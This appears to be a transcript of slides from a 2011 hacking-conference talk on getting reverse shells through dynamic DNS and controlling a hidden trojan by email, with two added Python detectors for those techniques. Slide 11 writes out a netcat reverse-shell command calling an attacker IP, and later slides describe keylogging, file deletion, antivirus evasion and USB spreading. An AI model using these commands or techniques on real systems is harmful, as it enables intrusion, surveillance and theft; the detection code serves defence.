Handle Exploitation of Remote System Without Being Online (Merchant Bhaumik)
ClubHack 2011 Hacking and Security Conference.
Talk - Handle Exploitation of Remote System Without Being Online
Speaker - Merchant Bhaumik
  1. Handle Exploitation of Remote System Without Being Online !! By Merchant Bhaumik
  2. Who Am I?
     • Currently helping local law enforcement and helping secure some government websites
     • Developer of IND 360 Intrusion Detection System (host-based as well as network-based detection)
     • Communicating with the Metasploit guys to develop a term called "Universal Payload"
  3. Presentation Flow
     • Reverse shell using dynamic-DNS concepts
     • Getting data from the victim computer using an email tool
  4. We will understand this mechanism by considering one scenario…
  5. Jack's Situation: Jack works in a company in which all computers are behind the NAT box, and he has just decided to break into one of the systems of his office and get a shell from the office to his home computer.
  6. Problems for Jack
     • The company has a NIDS/IPS (network IDS), so no inbound connections
     • He doesn't know what IP address is allocated to him by his ISP
     • He can't use any mechanism which constantly sends some outbound traffic
  7. Good Thing for Jack: Jack's office allows him to access his Gmail account and allows some outbound traffic.
  8. I# INCLUDE <REVERSE SHELL>
  9. Why Reverse Shell?
     • A reverse shell is one of the powerful methods for bypassing network intrusion detection systems, firewalls (most of them), etc.
     • Because some of these network intrusion systems only monitor inbound connections, not outbound ones
     • Jack has a DMZ network in his office
  10. Diagram 1: [network diagram: DMZ hosts 192.168.1.1, 192.168.1.2, 192.168.1.3, 192.168.1.4 and 192.168.1.5 behind the office NAT with public IP 117.254.4.123; the individual (attacker) IP 49.24.3.12 sits across the Internet]
  11. Diagram 2 (Normal Attack!): [same network as Diagram 1; attacker IP 49.24.3.12, office public IP 117.254.4.123]
      Step I: Attacker starts a handler on port 4343: nc -l -p 4343
      Step II: Victim connects back: nc 49.24.3.12 4343 -e cmd.exe
  12. Normal Flow of Getting a Reverse Shell (reverse-shell scenario): Exploit! → Attacker starts handler → Vulnerability injection and all that → Victim sends reverse shell to the attacker machine → Attacker wins!
  13. But What's Wrong with Jack? He doesn't know what IP address is allocated to his computer (dynamic IP allocation by ISPs).
  14. Solution: The attacker is "offline", but still he will get the reverse shell.
  15. My Way (reverse-shell scenario): Exploit! → Attacker starts handler (starting the handler on the local machine is optional!) → Vulnerability injection and all that → Victim sends reverse shell to the attacker machine → Attacker wins!
  16. Flow of Execution: [flowchart] The attack exe is running in the victim machine. Did the attacker update the IP? No: the exe stays up and running in the remote machine even if the attacker is not online, and it keeps checking. Yes: once the attacker updates the DNS records, the reverse shell is on the attacker's desk; the attacker receives the reverse shell.
  17. Mechanism
      • If the code (first part) receives a positive acknowledgement of its sent packets, Jack will get the reverse shell
      • Else it keeps running in the victim machine and waits for an ack from the attacker's machine
  18. Dynamic DNS Way (Initially!)
      • First part: catchme.dyndns-ip.com (255.255.255.255)
      • Second part: payload.dyndns-ip.com (255.255.255.255)
      The new final exe (New.exe, a single EXE) consists of the first part and the second part in synchronous execution.
  19. Dynamic DNS Way (Finally!)
      • First part: catchme.dyndns-ip.com (127.0.0.1)
      • Second part: payload.dyndns-ip.com (attacker's IP)
      The new final exe (New.exe, a single EXE) consists of the first part and the second part in synchronous execution.
  20. Metasploit!
      • You can embed my method (or my exe) with the Metasploit payload of your choice.
      The structure of the new exe is as follows: the new final exe (New.exe, a single EXE) consists of My Tool and the MSF payload (LHOST = dynamic) in synchronous execution.
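The dynamic-DNS trick on slides 16 to 19 leaves a distinctive trace in resolver logs: a host polls a dynamic-DNS name that answers with a parking value (255.255.255.255, then 127.0.0.1) until the name flips to a real address. The detector below is an added example written for this page, not code from the talk; the log format, the extra DNS suffixes and the 0.0.0.0 sentinel are assumptions.

```python
import ipaddress
from collections import defaultdict

# 255.255.255.255 is the "not yet" value from slide 18 and 127.0.0.1 the "go" value from
# slide 19; 0.0.0.0 is an assumed extra parking value.
SENTINELS = {"255.255.255.255", "127.0.0.1", "0.0.0.0"}
# dyndns-ip.com is the provider named on the slides; the other suffixes are assumed additions.
DDNS_SUFFIXES = tuple("." + s for s in ("dyndns-ip.com", "dyndns.org", "no-ip.org"))

# Constructed sample resolver log: "<epoch> <client> <qname> <answer>", one query per line.
SAMPLE_LOG = """\
1000 192.168.1.3 catchme.dyndns-ip.com 255.255.255.255
1060 192.168.1.3 catchme.dyndns-ip.com 255.255.255.255
1120 192.168.1.3 payload.dyndns-ip.com 255.255.255.255
1180 192.168.1.3 catchme.dyndns-ip.com 127.0.0.1
1181 192.168.1.3 payload.dyndns-ip.com 49.24.3.12
1200 192.168.1.4 www.example.com 93.184.216.34
"""

def parse_log(text):
    """Yield (ts, client, qname, answer); malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, qname, answer = parts
        yield int(ts), client, qname.lower().rstrip("."), answer

def _is_global(addr):
    try:
        return ipaddress.ip_address(addr).is_global
    except ValueError:  # CNAME or other non-address answer
        return False

def find_signal_hosts(text):
    """Map (client, qname) -> {"sentinel_hits", "went_live"} for each dynamic-DNS name a
    client resolved to a sentinel at least once. A name parked on 255.255.255.255 or
    127.0.0.1 is not a host to connect to but a flag being polled; "went_live" is the
    first globally routable answer in the sequence, i.e. the handler address to block."""
    history = defaultdict(list)
    for ts, client, qname, answer in parse_log(text):
        if qname.endswith(DDNS_SUFFIXES):
            history[(client, qname)].append((ts, answer))
    alerts = {}
    for key, seq in history.items():
        seq.sort()
        hits = sum(1 for _, a in seq if a in SENTINELS)
        if hits:
            live = next((a for _, a in seq if _is_global(a)), None)
            alerts[key] = {"sentinel_hits": hits, "went_live": live}
    return alerts
```

On the sample log the client 192.168.1.3 is reported for both names, and payload.dyndns-ip.com is shown going live to 49.24.3.12, the address that would appear in the firewall deny rule.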
  21. Hands-On Network: [network diagram: same layout as Diagram 1, DMZ hosts 192.168.1.1 to 192.168.1.5 behind public IP 117.254.4.123, individual IP 49.24.3.12]
  22. Time to Enjoy Cooked Cookies and Recipes!!
  23. Demo
  24. II# INCLUDE <EMAIL TOOL>
  25. Normal Remote Trojans & Viruses: Attacker (must be online!) ↔ Victim (must be online!)
  26. My Tool!! Caution: no need to be online! Attacker (may or may not be online) ↔ Victim (may or may not be online)
  27. So, How Does It Work?? Attacker ↔ Zombie ↔ Victim
  28. But, Who Is the Zombie? It may be one of the below: [three images, not recoverable from the text]
  29. Features!!
      • Execute operating-system-level commands by using emails!
      • Get all network card information with allocated IP addresses!
      • Live tracking of the system being used by the victim!
      • Get the list of all available accounts!
      • Enable/disable the key logger!
      All this stuff with Gmail, Yahoo, Hotmail!!
  30. About It! It is a simple application which, once up and going on the victim's computer, the attacker can handle using Gmail, Yahoo or Hotmail email services. There is no need for the attacker to be online to attack the victim system. The attacker has to send attack instructions to any of the mail services, and then it is like sitting at the door and watching the event, "when it's gonna open!!" As the victim connects to the Internet, the attack launches and the results are automatically sent back to the attacker's email address.
  31. Cool Benefits!!
      • If the email account is accessed via one of the services below, then it is totally anti-forensic! No reverse detection is possible!
      • Create a unique password for each individual infected victim
      • Ability to handle multiple clients simultaneously
      • Delete files in the victim's computer by simply sending an email
      • No antivirus can detect the attack because of HTTPS
  32. Tool Syntax: Password_For_Victim ":" Task_Commands ":"
      E.g. Pwd$98$ : Account_info : — "Pwd$98$" is the password for the particular victim, and Account_info is the command which sends back an email containing the account info from the victim computer!
  33. Snap Shot 1 (Load Attack Instructions): [screenshot: password for the individual victim; send account info of victim; send drive info of victim; send MAC / network card info]
  34. Snap Shot 2 (Get Back Attack Result): [screenshot: attached info of the victim's computer, as per the attacker's choice, in my email account!]
  35. Why Gmail??
  36. No Fear of Detection 1: No direct connection between attacker and victim. [diagram: Attacker ↔ Victim]
  37. No Fear of Detection 2: No virus detection due to HTTPS. No digital signatures!! Ability to destruct itself!
  38. How to Spread This Code??
      • Autorun.inf on USB drives
      • Physical access to the victim's system
      • During Metasploit exploitation
  39. Further Possible Development!! This code is flexible enough to be developed further by my hacker friends. It is also possible in future to send exploits or trojans by using this code. Anyone can send exploits, trojans, rootkits or backdoors by simply attaching them to an email and sending it to his own account, or to the account that is configured in the victim's code.
  40. Pros N Cons 1 (Be Transparent!!): The advantages are that the attacker is never going to get caught if he/she uses a browser over TOR, Anonymizer, VPNs or any proxy for accessing the attacking Gmail account. No antivirus can detect the instruction data because all traffic is going to come over HTTPS! Only a single Gmail account is going to be used for both sides: the attacker and victim machines both connect to the same account, but the attacker knows and the victim doesn't!!
  41. Pros N Cons 2: The disadvantage is that if the victim has the habit of checking the current connections using commands like 'netstat -n', then there is a possibility of detecting the Gmail connection when there is actually no browser activity. But still it is difficult to detect, because the process is running in hidden mode.
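Slide 41 names the observable that survives HTTPS: a mail-service connection owned by something that is not a browser or mail client. A hidden window does not hide the socket owner, so the check below correlates each established socket with its process. This is an added example for this page, not code from the talk; the collector line format, the webmail name list and the process allowlist are assumptions, and the sample table is constructed with TEST-NET addresses.

```python
MAIL_PORTS = {143, 110, 993, 995, 465, 587}
# Webmail/IMAP names worth matching; the list is an assumption, extend it for your environment.
WEBMAIL_NAMES = ("gmail.com", "mail.google.com", "mail.yahoo.com", "outlook.live.com", "hotmail.com")
# Processes expected to own a mail socket; anything else holding one is reported.
ALLOWED_OWNERS = {"chrome.exe", "firefox.exe", "iexplore.exe", "outlook.exe", "thunderbird.exe"}

# Constructed sample, one socket per line: "proto local remote remote_name state pid image",
# as a hypothetical collector joining netstat-style output with reverse DNS might emit.
SAMPLE_TABLE = """\
TCP 192.168.1.3:51022 203.0.113.10:443 imap.gmail.com ESTABLISHED 1844 svchost.exe
TCP 192.168.1.3:51030 203.0.113.11:993 imap.gmail.com ESTABLISHED 2210 updater.exe
TCP 192.168.1.3:51041 203.0.113.12:443 mail.google.com ESTABLISHED 3120 chrome.exe
TCP 192.168.1.3:51050 203.0.113.20:443 www.example.com ESTABLISHED 2210 updater.exe
"""

def _is_mail_endpoint(remote_name, port):
    """True for a mail port or a remote name on (or under) a known webmail domain."""
    name = remote_name.lower().rstrip(".")
    return port in MAIL_PORTS or any(name == n or name.endswith("." + n) for n in WEBMAIL_NAMES)

def flag_mail_connections(table):
    """Return established connections to a mail endpoint whose owning process is not in
    ALLOWED_OWNERS. A process running hidden still owns its socket, so it shows up here."""
    flagged = []
    for line in table.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue
        _proto, _local, remote, remote_name, state, pid, image = parts
        port = int(remote.rsplit(":", 1)[1])
        if state != "ESTABLISHED" or not _is_mail_endpoint(remote_name, port):
            continue
        if image.lower() in ALLOWED_OWNERS:
            continue
        flagged.append({"pid": int(pid), "image": image, "remote": remote_name, "port": port})
    return flagged

if __name__ == "__main__":
    for hit in flag_mail_connections(SAMPLE_TABLE):
        print(f"pid {hit['pid']} ({hit['image']}) -> {hit['remote']}:{hit['port']}")
```

On the sample table the two non-browser owners (svchost.exe on 443 to imap.gmail.com, updater.exe on 993) are reported, while the Chrome session and the unrelated updater.exe connection are not.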
  42. Hands-On Time..! (Demo)
  43. For more: backdoor.security@gmail.com
  44. Thanks guys for checking it out!